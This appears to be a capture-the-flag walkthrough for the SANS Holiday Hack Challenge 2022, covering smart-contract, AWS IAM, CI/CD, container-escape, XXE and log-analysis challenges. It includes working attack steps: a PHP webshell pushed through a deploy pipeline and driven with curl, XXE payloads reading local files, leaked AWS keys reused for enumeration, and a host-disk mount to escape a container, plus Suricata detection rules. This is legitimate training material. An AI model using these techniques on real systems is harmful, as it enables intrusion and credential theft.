This report was created on, /ˈkrɪŋ.ɡəl krɑːft ˈkɑːm/. An online CTF solution editor and report generator inspired by SANS Holiday Hack Challenge & KringleCon.
Makes creating solutions and reports easy and fun 😀
KringleCon 5: Golden Rings!
I’m a Cyber Security Fanatic & Generic IT Fairy. I love doing riddles and solving problems. I have specialized in the area of cyber security but I’m far away from being an expert. I guess my average day is missing 8 additional hours, I do have a lovely family which is always number one! What’s left of the day I use to discover new things, try out software or even play CTF like stuff.
You have reached the last level. It's so hot in here. You're almost burning.
You have entered a huge room. Some very strange and huge machinery is located at the center. You wonder what that machine is doing here.
You have opened a door leading into a small elf house. It's quite cozy in here.
You have entered a boat. Using that vehicle you can cross that huge underground sea.
The place of Glamtariel's fountain. Do you dare to stare inside?
You have stepped into a tangled underground labyrinth. It's very dark in here and a lot of paths are leading to different locations.
You have entered a gigantic cave. On the left side you can see a small kitchen. Going deeper into the cave you will encounter something huge blocking your way.
You have reached the fourth level. It's almost too dark to see anything.
After solving all challenges you are able to enter the KringleCon buidling.
You have reached the cave where NetWars is talking place. A lot of participants are competing here against each other.
You have arrived at the entry point to this year’s KringleCon. In front of you you can see a grey fence and a cash machine.
You are standing at the main location of this year’s KringleCon. In front of you you can see the KringleCon building. At the left side there are a few booths.
Slicmer is standing next to a terminal.
Use the Blockchain Explorer in the Burning Ring of Fire to investigate the contracts and transactions on the chain. At what address is the KringleCoin smart contract deployed? Find hints for this objective hidden throughout the tunnels.
Every blockchain has a start :) So let's go back to the very start using the blockchain explorer:
And there it is already!
Transaction 0
This transaction creates a contract.
Contract Address: 0xc27A2D3DE339Ce353c0eFBa32e948a88F1C86554
Wombley Cube is standing next to a hat vending machine.
Travel to the Burning Ring of Fire and purchase a hat from the vending machine with KringleCoin. Find hints for this objective hidden throughout the tunnels.
After talking to Wombley Cube you get the following hints:
To purchase a hat, first find the hat vending machine in the Burning Ring of Fire. Select the hat that you think will give your character a bold and jaunty look, and click on it. A window will open giving you instructions on how to proceed with your purchase.
Before you can purchase something with KringleCoin, you must first approve the financial transaction. To do this, you need to find a KTM; there is one in the Burning Ring of Fire. Select the Approve a KringleCoin transfer button. You must provide the target wallet address, the amount of the transaction you're approving, and your private wallet key.
You should have been given a target address and a price by the Hat Vending machine. You should also have been given a Hat ID #. Approve the transaction and then return to the Hat Vending machine. You'll be asked to provide the Hat ID and your wallet address. Complete the transaction and wear your hat proudly!
So let's follow the hints. We go to the vending machine and select a fancy new hat. The vending machine says:
To purchase this hat you must:
Use a KTM to pre-approve a 10 KC transaction to the wallet address: 0xC2783B4531C95336B654249AFfd1Fe606f93d97d
Return to this kiosk and use Hat ID: 558 to complete your purchase.
Let's go to the KTM and select the option Approve a KringleCoin Transfer
. We fill the fields like in this example:
"To" Address: 0xC2783B4531C95336B654249AFfd1Fe606f93d97d
Amount (KC): 10
Your Key: (Well you should have noted it somewhere :) )
After approval we have a success here: You have successfully approved the transaction!
Going back to the vending machine and select Approved a transaction? Know your Hat ID? Click here to buy
. We fill the fields as following:
Your Wallet Address: (You have noted this as well :) )
Hat ID: 558 (depending on your taste)
Transaction succeeded!
TransactionID: 0x5e1e94fe24a52a87aff6a4a8d22a2f0346d6eac45691560730f34ed2f5406b46
Block 48993
We wear our new hat proudly:
Luigi is standing next to a terminal.
Exploit flaws in a smart contract to buy yourself a Bored Sporc NFT. Find hints for this objective hidden throughout the tunnels.
The The Bored Sporc Rowboat Society web site has three pages:
At first let's do a simple check using the presale page and following information:
Let's look at the web console and we see a POST
request to with following payload:
So it seems all we need is a valid Merkle Tree, it's Root and a Proof. Let's create one using this repo. The only code changes necessary are (for the other 2 leafs just take a address from the gallery page):
allowlist = ["0xa1861E96DeF10987E1793c8f77E811032069f8E9", "0x(yourownaddress)", "0xc249927fb81bde4eA7B9Dc9e4c9E6F503F147fe2"]
print('Proof:', mt.get_proof(Web3.solidityKeccak(['bytes'], ["0x(yourownaddress)"])))
Run it using docker:
docker build -t merkletrees .
docker run -it --rm --name=merkletrees merkletrees
mt_user@566f02498986:~$ python3
Root: 0x258e841a5cd9a65de7bba00172960e55e985fd29f4143cb5dc866bc29239ae80
Proof: ['0x083f32bd3c6bdf00d603dbd24cd0165fbfdd8afa09d082950baf6b425b1d0f5b']
We'll go back to the web site and copy the original presale call using the deveveloper tools and copy that request as cURL request (saved here as
. We substitute the root and proof in the payload with the values from our python script:
└─$ ./
{"Response": "You're on the list and good to go! Now... BUY A SPORC!"}
We'll note the society wallet address 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a
and use a KTM to transfer 100KC. We run the same script with the parameter changed "Validate":"false"
└─$ ./
{"Response": "Success! You are now the proud owner of BSRS Token #000179. You can find more information at, or check it out in the gallery!<br>Transaction: 0xb44139083a7bdd6181c464b1a31640d4bec2275d0ad9d00c8bf67ff371f5aa07, Block: 61904<br><br>Remember: Just like we planned, tell everyone you know to <u><em>BUY A BoredSporc</em></u>.<br>When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!<br><br>The market will tank, but we'll all be rich!!!"}
Indeed we have a beautiful Sporc NFT:
Jill Underpole is standing next to a smoke terminal.
Try out some basic AWS command line skills in this terminal. Talk to Jill Underpole in the Cloud Ring for hints.
After talking to Jill Underpole you get the following hints:
In the AWS command line (CLI), the Secure Token Service or STS has one very useful function.
Let's open the terminal:
You may not know this, but AWS CLI help messages are very easy to access. First, try typing:
$aws help
Let's do this by following the hints given:
elf@6fe373c006f7:~$ aws help
Great! When you're done, you can quit with q.
Next, please configure the default aws cli credentials with the access key AKQAAYRKO7A5Q5XUY2IY, the secret key qzTscgNdcdwIo/soPKPoJn9sBrl5eMQQL19iO5uf and the region us-east-1 .
elf@6fe373c006f7:~$ aws configure
AWS Secret Access Key [None]: qzTscgNdcdwIo/soPKPoJn9sBrl5eMQQL19iO5uf
Default region name [None]: us-east-1
Default output format [None]:
Excellent! To finish, please get your caller identity using the AWS command line. For more details please reference:
$ aws sts help
or reference:
elf@6fe373c006f7:~$ aws sts get-caller-identity
"Account": "602143214321",
"Arn": "arn:aws:iam::602143214321:user/elf_helpdesk"
We get following hints:
You can search for secrets in a Git repo with trufflehog git https://some.repo/here.git
If you want to look at an older code commit with git, you can git checkout CommitNumberHere
Sulfrod is standing at the top of that huge machine.
Flex some more advanced AWS CLI skills to escalate privileges! Help Gerty Snowburrow in the Cloud Ring to get hints for this challenge.
Let's open the terminal:
Use Trufflehog to find credentials in the Gitlab instance at
Configure these credentials for us-east-1 and then run:
$ aws sts get-caller-identity
Ok, so we feed the trufflehog:
└─$ trufflehog
- aws_access_key_id="AKIAAIDAYRANYAHGQOHD",
- aws_secret_access_key="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",
+ aws_access_key_id=ACCESSKEYID,
+ aws_secret_access_key=SECRETACCESSKEY,
As we are told to use that information:
elf@000bac2f1a6f:~$ aws configure
AWS Secret Access Key [None]: e95qToloszIgO9dNBsQMQsc5/foiPdKunPJwc1rL
Default region name [None]: us-east-1
Default output format [None]:
elf@000bac2f1a6f:~$ aws sts get-caller-identity
"Account": "602123424321",
"Arn": "arn:aws:iam::602123424321:user/haug"
We get a new note:
Managed (think: shared) policies can be attached to multiple users. Use the AWS CLI to find any policies attached to your user.
The aws iam command to list attached user policies can be found here:
Hint: it is NOT list-user-policies.
After a quick look at the AWS page we realize list-attached-user-policies
must be the right choice.
elf@000bac2f1a6f:~$ aws iam list-attached-user-policies --user-name haug
We get a new note:
Now, view or get the policy that is attached to your user.
The aws iam command to get a policy can be found here:
We decide to query this:
elf@000bac2f1a6f:~$ aws iam get-policy --policy-arn "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY"
"Policy": {
"Arn": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY",
"Path": "/",
"DefaultVersionId": "v1",
Again, we get a new note:
Attached policies can have multiple versions. View the default version of this policy.
The aws iam command to get a policy version can be found here:
Just append a version
elf@000bac2f1a6f:~$ aws iam get-policy-version --policy-arn "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY" --version-id "v1"
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
We get a new note:
Inline policies are policies that are unique to a particular identity or resource. Use the AWS CLI to list the inline policies associated with your user.
The aws iam command to list user policies can be found here:
Hint: it is NOT list-attached-user-policies.
This time it is:
elf@2e62f24e0761:~$ aws iam list-user-policies --user-name haug{
"PolicyNames": [
"IsTruncated": false
A new note:
Now, use the AWS CLI to get the only inline policy for your user.
The aws iam command to get a user policy can be found here:
That should be simple:
elf@2e62f24e0761:~$ aws iam get-user-policy --user-name haug --policy-name "S3Perms"
"Statement": [
"Effect": "Allow",
"Action": [
"Resource": [
A new note:
The inline user policy named S3Perms disclosed the name of an S3 bucket that you have permissions to list objects.
List those objects!
The aws s3api command to list objects in an s3 bucket can be found here:
A quick look again and...
elf@2e62f24e0761:~$ aws s3api list-objects --bucket smogmachines3
"Contents": [
"Key": "coal-fired-power-station.jpg",
"LastModified": "2022-09-23 20:40:44+00:00",
"ETag": "\"1c70c98bebaf3cff781a8fd3141c2945\"",
"Size": 59312,
"StorageClass": "STANDARD",
"Owner": {
"DisplayName": "grinchum",
"ID": "15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60"
A new note:
The attached user policy provided you several Lambda privileges. Use the AWS CLI to list Lambda functions.
The aws lambda command to list functions can be found here:
Simple as well:
elf@2e62f24e0761:~$ aws lambda list-functions
"Functions": [
"FunctionName": "smogmachine_lambda",
"FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda",
"Environment": {
"Variables": {
"LAMBDASECRET": "975ceab170d61c75",
"LOCALMNTPOINT": "/mnt/smogmachine_files"
New note:
Lambda functions can have public URLs from which they are directly accessible.
Use the AWS CLI to get the configuration containing the public URL of the Lambda function.
The aws lambda command to get the function URL config can be found here:
Let's try
elf@2e62f24e0761:~$ aws lambda get-function-url-config --function-name "smogmachine_lambda"
"FunctionUrl": "",
"FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda",
"AuthType": "AWS_IAM",
"Cors": {
"AllowCredentials": false,
"AllowHeaders": [],
"AllowMethods": [
And we did it:
Great, you did it all - thank you!
Gerty Snowburrow is standing near to that huge machine.
Use Trufflehog to find secrets in a Git repo. Work with Jill Underpole in the Cloud Ring for hints. What's the name of the file that has AWS credentials?
We'll open a terminal an run:
└─$ trufflehog
- aws_access_key_id=ACCESSKEYID,
- aws_secret_access_key=SECRETACCESSKEY,
+ aws_access_key_id="AKIAAIDAYRANYAHGQOHD",
+ aws_secret_access_key="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",
So the name of the file that has AWS credentials is
We get following hints:
AWS inline policies pertain to one identity while managed policies can be attached to many identities.
You can try s3api
or lambda
service commands, but Chris Elgee's talk on AWS and IAM might be a good start!
Rippin Proudboot is waiting for you on the first level.
Exploit a CI/CD pipeline. Get hints for this challenge from Tinsel Upatree in the Elfen Ring.
Let's open the terminal:
Greetings Noble Player,
Many thanks for answering our desperate cry for help!
You may have heard that some evil Sporcs have opened up a web-store selling
counterfeit banners and flags of the many noble houses found in the land of
the North! They have leveraged some dastardly technology to power their
storefront, and this technology is known as PHP!
This strorefront utilizes a truly despicable amount of resources to keep the
website up. And there is only a certain type of Christmas Magic capable of
powering such a thing… an Elfen Ring!
Along with PHP there is something new we've not yet seen in our land.
A technology called Continuous Integration and Continuous Deployment!
Be wary!
Many fair elves have suffered greatly but in doing so, they've managed to
secure you a persistent connection on an internal network.
BTW take excellent notes!
Should you lose your connection or be discovered and evicted the
elves can work to re-establish persistence. In fact, the sound off fans
and the sag in lighting tells me all the systems are booting up again right now.
Please, for the sake of our Holiday help us recover the Ring and save Christmas!
Before starting anything it's imporant to remember what the elves have said:
First, we'll clone that repository
grinchum-land:~$ git clone
Cloning into ''...
remote: Enumerating objects: 10195, done.
remote: Total 10195 (delta 0), reused 0 (delta 0), pack-reused 10195
Receiving objects: 100% (10195/10195), 36.49 MiB | 23.79 MiB/s, done.
Resolving deltas: 100% (1799/1799), done.
Updating files: 100% (9320/9320), done.
Let's have a look at the history:
grinchum-land:~/$ git log
commit e19f653bde9ea3de6af21a587e41e7a909db1ca5
Author: knee-oh <>
Date: Tue Oct 25 13:42:54 2022 -0700
A Whoops
is always interesting. We'll have a look what happened there:
diff --git a/.ssh/.deploy b/.ssh/.deploy
deleted file mode 100644
index 3f7a9e3..0000000
--- a/.ssh/.deploy
+++ /dev/null
@@ -1,7 +0,0 @@
diff --git a/.ssh/ b/.ssh/
deleted file mode 100644
index 8c0b43c..0000000
--- a/.ssh/
+++ /dev/null
@@ -1 +0,0 @@
-ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri
Whoops, that indeed is an SSH public/private keypair. Guess we can find a valid target using these credentials:
grinchum-land:~$ ssh-keygen -t ed25519
grinchum-land:~$ cat .ssh/id_ed25519*
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri
grinchum-land:~$ ssh
PTY allocation request failed on channel 0
Welcome to GitLab, @knee-oh!
Connection to closed.
Seems to be working. So another clone using these credentials:
grinchum-land:~/clone$ git clone
Cloning into ''...
remote: Enumerating objects: 10195, done.
remote: Total 10195 (delta 0), reused 0 (delta 0), pack-reused 10195
Receiving objects: 100% (10195/10195), 36.49 MiB | 22.66 MiB/s, done.
Resolving deltas: 100% (1799/1799), done.
Updating files: 100% (9320/9320), done.
Taking a deeper look at the repo there is a ci/cd build script:
grinchum-land:~/$ cat .gitlab-ci.yml
- deploy
stage: deploy
environment: production
- rsync -e "ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy" --chown=www-data:www-data -atv --delete --progress ./
Let's just use this build pipeline and commit a simple PHP webshell (PHP as wordpress is also based on that):
grinchum-land:~/$ vim shell.php
grinchum-land:~/$ git add shell.php
grinchum-land:~/$ git commit
grinchum-land:~/$ git config --global ""
grinchum-land:~/$ git config --global "Your Name"
grinchum-land:~/$ git commit
Time for a test flight:
grinchum-land:~/$ curl -s -X POST -d "cmd=whoami" | grep -A 1 Output
Let's dig deeper:
grinchum-land:~/$ curl -s -X POST -d "cmd=ls -l /"
drwxr-xr-x 1 root root 4096 Dec 15 14:19 etc
-rw-r--r-- 1 www-data www-data 7575 Oct 22 16:40 flag.txt
drwxr-xr-x 2 root root 4096 Sep 3 12:10 home
grinchum-land:~/$ curl -s -X POST -d "cmd=cat /etc/flag"
Congratulations! You've found the HHC2022 Elfen Ring!
░░░░ ░░░░
░░ ░░░░
░░ ▒▒▓▓▓▓ oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT ░░░░░░░░ ░░▒▒▒▒▓▓
Escape from a container. Get hints for this challenge from Bow Ninecandle in the Elfen Ring. What hex string appears in the host file /home/jailer/.ssh/jail.key.priv
Let's open the terminal:
Sat Dec 10 23:41:50 UTC 2022
On attempt [5] of trying to connect.
If no connection is made after [60] attempts
contact the holidayhack sys admins via discord.
Greetings Noble Player,
You find yourself in a jail with a recently captured Dwarven Elf.
He desperately asks your help in escaping for he is on a quest to aid a friend in a search for treasure inside a crypto-mine.
If you can help him break free of his containment, he claims you would receive "MUCH GLORY!"
Please, do your best to un-contain yourself and find the keys to both of your freedom.
Checking sudo permissions is always a good idea:
grinchum-land:~$ sudo -l
User samways may run the following commands on grinchum-land:
grinchum-land:~$ sudo /bin/bash
The challenge already told us about containers, but just to be sure we're in a container:
grinchum-land:/home/samways# cat /proc/1/cgroup
Maybe our container has more permissions than it should have. Let's do a quick fdisk
grinchum-land:/home/samways# fdisk -l
Disk /dev/vda: 2048 MB, 2147483648 bytes, 4194304 sectors
2048 cylinders, 64 heads, 32 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/vda doesn't contain a valid partition table
Why not trying to mount that disk and see if we can access the host's files?
grinchum-land:/home/samways# mkdir mnt
grinchum-land:/home/samways# mount /dev/vda mnt/
grinchum-land:/home/samways# find mnt/home/
grinchum-land:/home/samways# cat mnt/home/jailer/.ssh/jail.key.priv
You've found the secret for the
HHC22 container escape challenge!
___ ( _'-_ -_.'
_.-' `-._| - :- |
.'_ `.
.'_ 082bb339ec19de4935867 `-.
`--..____ _`.
| -_ -_|
We have solved that challenge and get the confirmation:
Find the Next Objective
Talk to Tinsel Upatree for the next objective.
We get following hints:
The thing about Git is that every step of development is accessible – even steps you didn't mean to take! git log
can show code skeletons.
If you find a way to impersonate another identity, you might try re-cloning a repo with their credentials.
Bow Ninecandle is wearing a blue hat and is standing next to a terminal located on a small platform.
Clone a code repository. Get hints for this challenge from Bow Ninecandle in the Elfen Ring.
After talking to Bow Ninecandle you will receive following hint:
There's a consistent format for Github repositories cloned via HTTPS. Try converting!
Let's open the terminal:
We just need you to clone one repo: git clone
This should be easy, right?
Thing is: it doesn't seem to be working for me. This is a public repository though. I'm so confused!
Please clone the repo and cat the file.
Then runtoanswer and tell us the last word of the file!
As we don't have SSH access, let's just try to convert the URL into an HTTPS scheme. You just need to be aware where the single elements (repo server, project owner, repository name) are "placed":
bow@74c201af2077:~$ git clone
Cloning into 'aws_scripts'...
remote: Enumerating objects: 64, done.
remote: Total 64 (delta 0), reused 0 (delta 0), pack-reused 64
Unpacking objects: 100% (64/64), 23.83 KiB | 1.49 MiB/s, done.
Let's find and analyze that file:
bow@74c201af2077:~$ find ./ -name ""
bow@74c201af2077:~$ tail -n 1 ./aws_scripts/
If you have run out of energy or time for your project, put a note at the top of the README saying that development has slowed down or stopped completely. Someone may choose to fork your project or volunteer to step in as a maintainer or owner, allowing your project to keep going. You can also make an explicit request for maintainers.
bow@74c201af2077:~$ runtoanswer
Read that repo!
What's the last word in the file for the aws_scripts repo?
> maintainers
Your answer: maintainers
Your answer is correct!
We have solved that challenge and get the confirmation:
Find the Next Objective
Talk to Bow Ninecandle for the next objective.
We get following hints:
When users are over-privileged, they can often act as root. When containers have too many permissions, they can affect the host!
Were you able to mount
up? If so, users' home/
directories can be a great place to look for secrets...
Akbowl is standing next to the fountain. He is desperately looking for something inside the fountain.
Stare into Glamtariel's fountain and see if you can find the ring! What is the filename of the ring she presents you? Talk to Hal Tandybuck in the Web Ring for hints.
Let's open that web site, we'll be presented with following screen:
All we can do at the moment is to drag and drop the icons at the upper left onto Glamtariel or the fountain and get some hints for exchange. We already got another hint from the elves to be aware of all capital letter words, so let's note:
As we are not able to do very much else let's analyze that web site in Burp Suite. So open up Burp Suite -> Select Tab Proxy -> Open browser -> Enter URL Let's just repeat the steps above and collect all that data. In the tab Proxy we can see a lot of requests like POST /dropped
. Send one of those to the repeater and we have a request as:
POST /dropped HTTP/2
Cookie: MiniLembanh=4313b833-8e9c-4a51-923b-e995336d241c.kUIEkPpFeuElxBe8Y0TskIoFPQk; GCLB="52eeeb95b0a69f8d"
Accept: application/json
Content-Type: application/json
The response for that will be:
HTTP/2 200 OK
Server: Werkzeug/2.2.2 Python/3.10.8
Content-Type: application/json
Set-Cookie: MiniLembanh=4313b833-8e9c-4a51-923b-e995336d241c.kUIEkPpFeuElxBe8Y0TskIoFPQk;; Path=/
"appResp": "Ah, the fiery red ring! I'm definitely proud to have one of them in my collection.^I think Glamtariel might like the red ring just as much as the blue ones, perhaps even a little more.",
"droppedOn": "princess",
"visit": "none"
Please note if you are tampering (relates to hint 1) with the cookies, you will need to reset the session. As this challenge is related to XML external entity attacks (XXE) and hint 2 says we are able to use other languages we modify the request so it get's sent as XML not as JSON:
Content-Type: application/json
-> will be ->
Content-Type: application/xml
-> will be ->
<?xml version='1.0'?>
Indeed this change is working and we are still getting a valid response. We are preparing the payload for XXE (as we don't know which parameter might be vulnerable let's just start with the first and obvious one):
<?xml version='1.0'?>
<!DOCTYPE root [
<!ENTITY xxe "img4" >]>
The response is still valid so let's swap <!ENTITY xxe "img4" >]>
with <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
. Sadly we get a bad response:
Sorry, we dont know anything about that.^Sorry, we dont know anything about that.
So we have to build our path carefully. Let's look at one of the responses and use the remaining hints:
"appResp": "Careful with the fountain! I know what you were wondering about there. It's no cause for concern. The PATH here is closed!^Between Glamtariel and Kringle, many who have tried to find the PATH here uninvited have ended up very disAPPointed. Please click away that ominous eye!",
"droppedOn": "fountain",
"visit": "static/images/stage2ring-eyecu_2022.png,260px,90px"
Let's try <!ENTITY xxe SYSTEM "file:///app/static/images/ringlist.txt" >]>
. I have to admit, there was a lot of guessing and trial and error involved. But at the end it worked:
"appResp": "Ah, you found my ring list! Gold, red, blue - so many colors! Glad I don't keep any secrets in it any more! Please though, don't tell anyone about this.^She really does try to keep things safe. Best just to put it away. (click)",
"droppedOn": "none",
"visit": "static/images/pholder-morethantopsupersecret63842.png,262px,100px"
Let's view
So the final path will be e.g. <!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/redring.txt" >]>
. We are trying all the colors, when choosing greenring.txt
we get another response:
"appResp": "Hey, who is this guy? He doesn't have a ticket!^I don't remember seeing him in the movies!",
"droppedOn": "none",
"visit": "static/images/x_phial_pholder_2022/tomb2022-tommyeasteregg3847516894.png,230px,30px"
Let's view
Yeah, we found an easter egg :) When choosing silverring.txt
we get:
"appResp": "I'd so love to add that silver ring to my collection, but what's this? Someone has defiled my red ring! Click it out of the way please!.^Can't say that looks good. Someone has been up to no good. Probably that miserable Grinchum!",
"droppedOn": "none",
"visit": "static/images/x_phial_pholder_2022/redring-supersupersecret928164.png,267px,127px"
Let's view
Guess this is the final station goldring_to_be_deleted.txt
"appResp": "Hmmm, and I thought you wanted me to take a look at that pretty silver ring, but instead, you've made a pretty bold REQuest. That's ok, but even if I knew anything about such things, I'd only use a secret TYPE of tongue to discuss them.^She's definitely hiding something.",
"droppedOn": "none",
"visit": "none"
So let's switch it as following (I guess these hints relate to the element reqType
which might also be vulnerable:
<?xml version='1.0'?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" >]>
And the result:
"appResp": "No, really I couldn't. Really? I can have the beautiful silver ring? I shouldn't, but if you insist, I accept! In return, behold, one of Kringle's golden rings! Grinchum dropped this one nearby. Makes one wonder how 'precious' it really was to him. Though I haven't touched it myself, I've been keeping it safe until someone trustworthy such as yourself came along. Congratulations!^Wow, I have never seen that before! She must really trust you!",
"droppedOn": "none",
"visit": "static/images/x_phial_pholder_2022/goldring-morethansupertopsecret76394734.png,200px,290px"
Let's view
Fitzy Shortstack is standing next to a terminal.
Help detect this kind of malicious activity in the future by writing some Suricata rules. Work with Dusty Giftwrap in the Tolkien Ring to get some hints.
Let's open the terminal:
Use your investigative analysis skills and the suspicious.pcap file to help develop Suricata rules for the elves!
There's a short list of rules started in suricata.rules in your home directory.
First off, the STINC (Santa's Team of Intelligent Naughty Catchers) has a lead for us.
They have some Dridex indicators of compromise to check out.
First, please create a Suricata rule to catch DNS lookups for
Whenever there's a match, the alert message (msg) should read Known bad DNS lookup, possible Dridex infection.
Add your rule to suricata.rules
Once you think you have it right, run ./rule_checker to see how you've done!
As you get rules correct, rule_checker will ask for more to be added.
If you want to start fresh, you can exit the terminal and start again or cp suricata.rules.backup suricata.rules
Good luck, and thanks for helping save the North Pole!
Let's create our first rule according to Suricata Docs, chapter 6.14:
alert dns $HOME_NET any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns_query; content:""; nocase; sid:1;)
We run the checker:
elf@755c971f69bd:~$ ./rule_checker
First rule looks good!
STINC thanks you for your work with that DNS record! In this PCAP, it points to
Develop a Suricata rule that alerts whenever the infected IP address communicates with internal systems over HTTP.
When there's a match, the message (msg) should read Investigate suspicious connections, possible Dridex infection
Let's create our second bi-directional rule according to Suricata Docs, chapter 6.12:
alert http [,$HOME_NET] any -> [,$HOME_NET] any (msg:"Investigate suspicious connections, possible Dridex infection"; flow: established;)
We run the checker:
elf@d905f5900694:~$ ./rule_checker
First rule looks good!
Second rule looks good!
We heard that some naughty actors are using TLS certificates with a specific CN.
Develop a Suricata rule to match and alert on an SSL certificate for
When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection
Let's create our third rule according to Suricata Docs, chapter 6.15. As we get a SC_ERR_DUPLICATE_SIG
error, we introduce a newer sid:
alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:"Investigate bad certificates, possible Dridex infection"; flow:established,to_client; tls.cert_subject; content:"";sid:10002;)
We run the checker:
elf@d905f5900694:~$ ./rule_checker
First rule looks good!
Second rule looks good!
Third rule looks good!
OK, one more to rule them all and in the darkness find them.
Let's watch for one line from the JavaScript: let byteCharacters = atob
Oh, and that string might be GZip compressed - I hope that's OK!
Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection
Let's create our fourth rule:
alert http any any -> any any (msg:"Suspicious JavaScript function, possible Dridex infection"; flow:established,from_server; http.response_body; content:"let byteCharacters = atob"; sid:10003;)
Running the checker once again, we have solved that challenge and recovered the Tolkien Ring.
Dusty Giftwrap is standing next to a terminal.
Investigate the Windows event log mystery in the terminal or offline. Get hints for this challenge by typing hint
in the upper panel of the Windows Event Logs terminal.
Let's open the terminal:
Grinchum successfully downloaded his keylogger and has gathered the admin credentials!
We thing he used PowerShell to find the Lembanh recipe and steal our secret ingredient.
Luckily, we enable PowerShell auditing and have exported the Windows PowerShell logs to a flat text file.
Please help me analyze this file and answer my questions.
Ready to begin?
We see the first question:
1. What month/day/year did the attack take place? For example, 09/05/2021.
Using Windows Events we convert the evtx
file to a plain txt
file. We group the events, please be aware the regex depends on the language, this example is using German language settings:
PS C:\Temp> Get-Content .\powershell.txt | Where-Object {$_ -match "[0-9]{1,2}\.[0-9]{1,2}\.[0-9]{4}"} | ForEach-Object {($_ -split "\s+")[1]} | Group-Object
Count Name Group
----- ---- -----
3540 24.12.2022 {24.12.2022, 24.12.2022, 24.12.2022, 24.12.2022...}
46 14.10.2022 {14.10.2022, 14.10.2022, 14.10.2022, 14.10.2022...}
The second question appears:
2. An attacker got a secret from a file. What was the original file's name?
We'll sort the event log in reverse order. As we are looking for files a search for parameter assignments and Content
could be a good idea.
PS C:\Temp> $chrono | Select-String "^\$" | Select-String "Content"
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
$foo = Get-Content .\Recipe| % {$_-replace 'honey','fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
$foo = Get-Content .\Recipe| % {$_-replace 'honey','fish oil'}
$foo | Add-Content -Path 'recipe_updated.txt'
$foo | Add-Content -Path 'Recipe.txt'
$foo = Get-Content .\Recipe| % {$_-replace 'honey','fish oil'}
$foo | Add-Content -Path 'Recipe.txt'
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'}
$foo | Add-Content -Path 'Recipe.txt'
$foo | Add-Content -Path 'Recipe'
The third question appears:
3. The contents of the previous file were retrieved, changed, and stored to a variable by the attacker. This was done multiple times. Submit the last full PowerShell line that performed only these actions.
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path
Let's look at the last/first (reverse chronological order) which contains our keyword Recipe
PS C:\Temp> $chrono | Select-String "^\$" | Select-String "Recipe"
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path
The fourth questions appears:
4. After storing the altered file contents into the variable, the attacker used the variable to run a separate command that wrote the modified data to a file. This was done multiple times. Submit the last full PowerShell line that performed only this action.
$foo | Add-Content -Path 'Recipe'
This can also be evaluated from the output above. The fifth question appears:
5. The attacker ran the previous command against a file multiple times. What is the name of this file?
Same here. The sixth question appears:
6. Were any files deleted? (Yes/No)
Let's look for a del
PS C:\Temp> $chrono | Select-String "del "
del .\Recipe.txt
del .\recipe_updated.txt
The seventh question appears:
7. Was the original file (from question 2) deleted? (Yes/No)
The original file Recipe
was not listed above. The eight question appears:
8. What is the Event ID of the log that shows the actual command line used to delete the file?
We'll print some lines before/after the del
PS C:\Temp> $chrono | Select-String "del " -Context 1,1
> del .\Recipe.txt
Ausführlich 24.12.2022 11:05:42 Microsoft-Windows-PowerShell 4104 Remotebefehl ausführen "ScriptBlock-Text (1 von 1) wird erstellt:
> del .\recipe_updated.txt
Ausführlich 24.12.2022 11:05:51 Microsoft-Windows-PowerShell 4104 Remotebefehl ausführen "ScriptBlock-Text (1 von 1) wird erstellt:
The ninth question appears:
9. Is the secret ingredient compromised (Yes/No)?
Let's look for secret ingredients:
PS C:\Temp> $chrono | Select-String "secret"
ParameterBinding(Out-Default): name=""InputObject""; value=""1/2 tsp honey (secret ingredient)""
PS C:\Temp> $chrono | Select-String "honey" | Select-String "replace"
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'}
The tenth question appears:
10. What is the secret ingredient?
This can also be evaluated from the output above.
We have solved that challenge and get the confirmation:
Find the Next Objective
Talk to Fitzy Shortstack for the next objective.
We get following hints:
This is the official source for Suricata rule creation!
Sparkle Redberry is standing is next to a terminal.
Use the Wireshark Phishing terminal in the Tolkien Ring to solve the mysteries around the suspicious PCAP. Get hints for this challenge by typing hint
in the upper panel of the terminal.
Let's open the terminal
This all started when I clicked on a link in my email.
Can you help me? yes
The first question appears:
1. There are objects in the PCAP file that can be exported by Wireshark and/or Tshark. What type of objects can be exported from this PCAP?
When opening the PCAP file in Wireshark we can already see a few HTTP protocol entries. The second questions appears:
2. What is the file name of the largest file we can export?
Just select File -> export objects -> HTTP, we can see app.php with a size of 808KB. The third question appears:
3. What packet number starts that app.php file?
Can also be seen in the exports objects windows. The fourth question appears:
4. What is the IP of the Apache server?
